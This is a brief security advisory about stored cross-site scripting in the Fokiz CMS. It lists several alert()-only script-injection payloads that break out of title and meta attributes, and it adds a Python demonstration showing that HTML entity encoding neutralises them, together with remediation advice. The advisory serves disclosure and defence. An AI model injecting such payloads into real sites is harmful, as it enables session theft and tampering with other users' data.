Fokiz
Insufficient input sanitization
A logged-in user can inject attack code and update, delete or modify other users' credentials, sessions or any other data.
[Example attacks]
//Edit text input - bad tags cause the script tag not to be properly escaped
- <p p=""> Content ... </p><p><script>alert("Bad content");</script></p>
//Edit page properties - missing input validation
- Home</title><script>alert('Bad title');</script>
- home,page"><script>alert('Bad keyword');</script><br/
- Welcome to the Website" name="description"><script>alert('Bad description');</script><br id="
- <script>alert('vulnerable tag');</script>
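
The page-property payloads above work because the stored title, keywords and description are written into the page head without output encoding. The following is an added example, not Fokiz code: it renders the three payloads into a hypothetical head template (the HEAD string and all function names are assumptions) first unescaped, then with HTML entity encoding applied at output time.

```python
import html

# Payloads copied from the page-properties examples above.
PAYLOADS = {
    "title": "Home</title><script>alert('Bad title');</script>",
    "keywords": "home,page\"><script>alert('Bad keyword');</script><br/",
    "description": "Welcome to the Website\" name=\"description\">"
                   "<script>alert('Bad description');</script><br id=\"",
}

# Hypothetical head template; Fokiz's real markup is not shown on the page.
HEAD = ('<title>{title}</title>\n'
        '<meta name="keywords" content="{keywords}">\n'
        '<meta name="description" content="{description}">')


def render_head_unsafe(props):
    """Vulnerable form: stored values are placed into the markup as-is."""
    return HEAD.format(**props)


def render_head_escaped(props):
    """Hardened form: encode &, <, >, " and ' when writing the value out."""
    safe = {k: html.escape(v, quote=True) for k, v in props.items()}
    return HEAD.format(**safe)


def has_live_script(markup):
    """True if the markup still contains a literal <script> tag."""
    return "<script" in markup.lower()


if __name__ == "__main__":
    print("unsafe :", has_live_script(render_head_unsafe(PAYLOADS)))
    print("escaped:", has_live_script(render_head_escaped(PAYLOADS)))
    print(render_head_escaped(PAYLOADS))
```

Entity encoding fits the title and meta attribute contexts; the text-input field, which is meant to hold markup, needs an allow-list HTML sanitizer instead.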